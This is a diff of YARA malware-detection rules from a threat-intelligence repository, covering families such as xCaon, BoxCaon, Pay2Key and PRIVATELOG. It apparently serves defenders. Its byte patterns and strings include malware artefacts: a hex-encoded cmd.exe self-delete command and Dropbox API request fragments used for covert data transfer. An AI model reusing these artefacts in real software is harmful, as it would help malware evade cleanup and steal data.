ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE -{ - meta: - description = "Detect PRIVATELOG malware" - author = "Arkbird_SOLG" - id = "fa122d77-0bac-5836-85fd-b096660f7412" - date = "2021-09-01" - modified = "2021-09-05" - reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22" - license_url = "N/A" - logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e" - score = 50 - quality = 50 - tags = "FILE" - hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c" - hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090" - level = "experimental" - tlp = "White" - adversary = "-" - - strings: - $s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec } - $s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 } - $s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 } - $s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 } - $s5 = "Global\\APCI#" fullword wide - $s6 = "uGlobal\\HVID_" fullword ascii - - condition: - uint16(0)==0x5A4D and filesize >20KB and 4 of ($s*) -} -rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE +rule ARKBIRD_SOLG_Mal_Xcaon_Jul_2021_1 : FILE { meta: - description = "Detect Stashlog malware" + description = "Detect the xCaon malware" author = "Arkbird_SOLG" - id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93" - date = "2021-09-01" - modified = "2021-09-05" - reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21" + id = "bcd5a52d-9547-5709-95f4-9d1f956f623c" + date = "2021-07-01" + modified = "2021-07-02" + reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_xCaon_Jul_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b" - score = 50 + logic_hash = "9c3e3d0035596323a505404ecc067bd2b87a4b0ac7499f1c87aac015f59eb65a" + score = 75 quality = 75 tags = "FILE" - hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397" - hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c" - level = "experimental" + hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b" + hash2 = "e9013f35ce11fc4c5eb2c21827bdc459202d362365d6ea5b724dee4fe0088bd1" + hash3 = "489fca69a622195328302e64e29b6183feac90826dce198432d603202ca4d216" tlp = "White" - adversary = "-" + adversary = "IndigoZebra" strings: - $s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii - $s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 } - $s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f } - $s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f } - $s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 } + $s1 = { a1 7c 10 41 00 33 c5 89 45 fc 8b 45 08 56 57 6a 49 89 85 f8 80 ff ff 58 6a 50 66 89 45 c8 58 6a 48 66 89 45 ca 58 6a 4c 66 89 45 cc 58 6a 50 66 89 45 ce 58 6a 41 66 89 45 d0 58 6a 50 66 89 45 d2 58 6a 49 66 89 45 d4 58 6a 2e 66 89 45 d6 58 6a 44 66 89 45 d8 58 66 89 45 da 6a 4c 58 66 89 45 dc 66 89 45 de 33 c0 66 89 45 e0 8d 45 c8 50 c7 45 e4 47 65 74 41 c7 45 e8 64 61 70 74 c7 45 ec 65 72 73 49 c7 45 f0 6e 66 6f 00 ff 15 50 d0 40 00 8d 4d e4 51 50 89 85 f4 80 ff ff ff 15 54 d0 40 00 8d 8d f0 80 ff ff 51 8d 8d fc 80 ff ff 51 c7 85 f0 80 ff ff 90 7e 00 00 ff d0 8b c8 33 c0 c6 45 f4 00 8d 7d f5 ab 66 ab aa 85 c9 0f 85 1d 01 00 00 53 6a 25 5e 6a 30 5a 6a 32 59 8b c6 66 89 45 8c 8b c2 66 89 45 8e 6a 58 8b c1 66 89 45 90 58 8b f8 6a 2d 66 89 7d 92 5f 8b df 66 89 5d 94 8b de 66 89 5d 96 8b da 66 89 5d 98 8b d9 66 89 5d 9a 8b d8 66 89 5d 9c 8b df 66 89 5d 9e 8b de 66 89 5d a0 8b da 66 89 5d a2 8b d9 66 89 5d a4 8b d8 66 89 5d a6 8b df 66 89 5d a8 8b de 66 89 5d aa 8b da 66 89 5d ac 8b d9 66 89 5d ae 8b d8 66 89 5d b0 8b df 66 89 5d b2 8b de 66 89 5d b4 8b da 66 89 5d b6 8b d9 66 89 45 c4 66 89 5d b8 8b d8 33 c0 66 89 45 c6 6a 06 8d 85 90 82 ff ff 50 8d 45 f4 50 66 89 5d ba 66 89 7d bc 66 89 75 be 66 89 55 c0 66 89 4d c2 e8 ?? 17 00 00 0f b6 45 f9 50 0f b6 45 f8 50 0f b6 45 f7 50 0f b6 45 f6 50 0f b6 45 f5 50 0f b6 45 f4 50 8d 45 8c 50 ff b5 f8 80 ff ff ff 15 44 d1 40 00 83 c4 2c 33 f6 46 5b ff b5 f4 80 ff ff ff 15 4c d0 40 00 8b } + $s2 = { 6a 5b 58 6a 55 66 89 45 c4 58 6a 70 66 89 45 c6 58 6a 6c 66 89 45 c8 58 6a 6f 66 89 45 ca 58 6a 61 66 89 45 cc 58 6a 64 66 89 45 ce 58 6a 5d 66 89 45 d0 58 6a 0d 66 89 45 d2 58 6a 0a 66 89 45 d4 58 6a 25 66 89 45 d6 33 c0 66 89 45 d8 58 6a 74 66 89 45 ac 8b c6 66 89 45 ae 58 6a 6d 66 89 45 b0 58 6a 70 66 89 45 b2 58 6a 25 66 89 45 b4 58 6a 64 66 89 45 b6 58 6a 2e 66 89 45 b8 58 6a 6c 66 89 45 ba 58 6a 6f 66 89 45 bc 58 6a 67 66 89 45 be 58 6a 46 66 89 45 c0 33 c0 66 89 45 c2 58 6a 69 66 89 45 dc 58 6a 6c 66 89 45 de 58 6a 65 66 89 45 e0 58 6a 3a 66 89 45 e2 58 66 89 45 e4 6a 25 58 66 89 45 e6 6a 0d 58 66 89 45 ea 6a 0a 58 66 89 45 ec 33 c0 66 89 45 ee 8d 45 c4 50 66 89 75 e8 e8 ?? 11 00 00 59 8d 4d c4 8d b5 50 f3 ff ff e8 [2] ff ff 89 bd 4c f2 ff ff c7 85 48 f3 ff ff 0f 00 00 00 89 bd 44 f3 ff ff c6 85 34 f3 ff ff 00 8d 85 34 f3 ff ff 50 83 ec 1c c6 45 fc 03 8d 85 fc f2 ff ff 8b f4 89 a5 50 f2 ff ff 50 e8 [2] ff ff e8 [2] ff ff 8b 9d 34 f3 ff ff 83 c4 20 83 bd 48 f3 ff ff 10 73 06 8d 9d 34 f3 ff ff 8d 85 4c f2 ff ff 50 } + $s3 = { 83 c4 10 8d 85 6c fb ff ff 50 68 04 01 00 00 ff 15 2c d0 40 00 33 c0 56 66 89 85 74 fd ff ff 8d 85 76 fd ff ff 53 50 e8 ?? 10 00 00 83 c4 0c ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 6c fb ff ff 50 8d 45 ac 50 8d 85 74 fd ff ff 50 ff d6 83 c4 10 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 74 fd ff ff 50 ff 15 24 d0 40 00 8b f8 83 ff ff 74 79 53 8d 85 50 f2 ff ff 50 ff b5 4c f2 ff ff 89 9d 50 f2 ff ff ff b5 48 f2 ff ff 57 ff 15 14 d0 40 00 57 ff 15 34 d0 40 00 33 c0 68 fe 07 00 00 66 89 85 6c f3 ff ff 8d 85 6e f3 ff ff 53 50 e8 ?? 10 00 00 8d 85 74 fd ff ff 50 8d 45 dc 50 8d 85 6c f3 ff ff 50 ff d6 8d 85 6c f3 ff ff 50 8d 85 18 f3 ff ff 50 8d 8d 50 f3 ff ff e8 [2] ff ff 83 } + $s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b } + $s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 } + $s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 } condition: - uint16(0)==0x5A4D and filesize >20KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize >30KB and 5 of ($s*) } -rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE { meta: - description = "Detect Pay2Key ransomware" + description = "Detect the BoxCaon malware" author = "Arkbird_SOLG" - id = "440b8128-4708-54ba-94c3-c0b522004da6" - date = "2020-12-01" - modified = "2020-12-14" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31" + id = "5f456b73-02f9-5dd7-973e-bde20dcddd27" + date = "2021-07-01" + modified = "2021-07-02" + reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590" + logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc" score = 75 - quality = 75 + quality = 46 tags = "FILE" - hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00" - hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467" - hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f" + hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b" + hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2" + tlp = "White" + adversary = "IndigoZebra" strings: - $s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii - $s2 = ".\\Cobalt-Client-log.txt" fullword ascii - $s3 = ".\\Config.ini" fullword wide - $s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii - $s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii - $s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 } - $s7 = "%WINDRIVE%" fullword wide - $s8 = "%WINDIR%" fullword wide - $dbg1 = "message.txt" fullword ascii - $dbg2 = "Failed To Get Data...." fullword ascii - $dbg3 = "lock.locked()" fullword wide - $dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a } - $dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a } - $dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 } - $dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a } + $s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d } + $s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d } + $s3 = "api.dropboxapi.com" fullword ascii + $s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 } + $s5 = "C:\\Users\\Public\\%d\\" fullword ascii + $s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d } + $s7 = { 25 73 2f [1-4] 2e 74 78 74 } + $s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 } condition: - uint16(0)==0x5a4d and filesize >500KB and (5 of ($s*) and 4 of ($dbg*)) + uint16(0)==0x5a4d and filesize >30KB and 6 of ($s*) } -rule ARKBIRD_SOLG_APT_Donot_Downloader_May_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE { meta: - description = "Detect the trojan downloader used by Donot group" + description = "Detect strings used by APT Nazar" author = "Arkbird_SOLG" - id = "251a809e-9e36-5c46-955f-006531bd9619" - date = "2020-05-09" - modified = "2021-05-09" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-09/Donot/APT_Donot_Downloader_May_2021_1.yara#L1-L20" + id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6" + date = "2020-04-29" + modified = "2023-11-22" + reference = "Internal research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29" license_url = "N/A" - logic_hash = "df64ab97b74935ce8b73c3854eb81fa1dbd4e59b1e27c43ae9c85b90aaaef6f7" + logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = 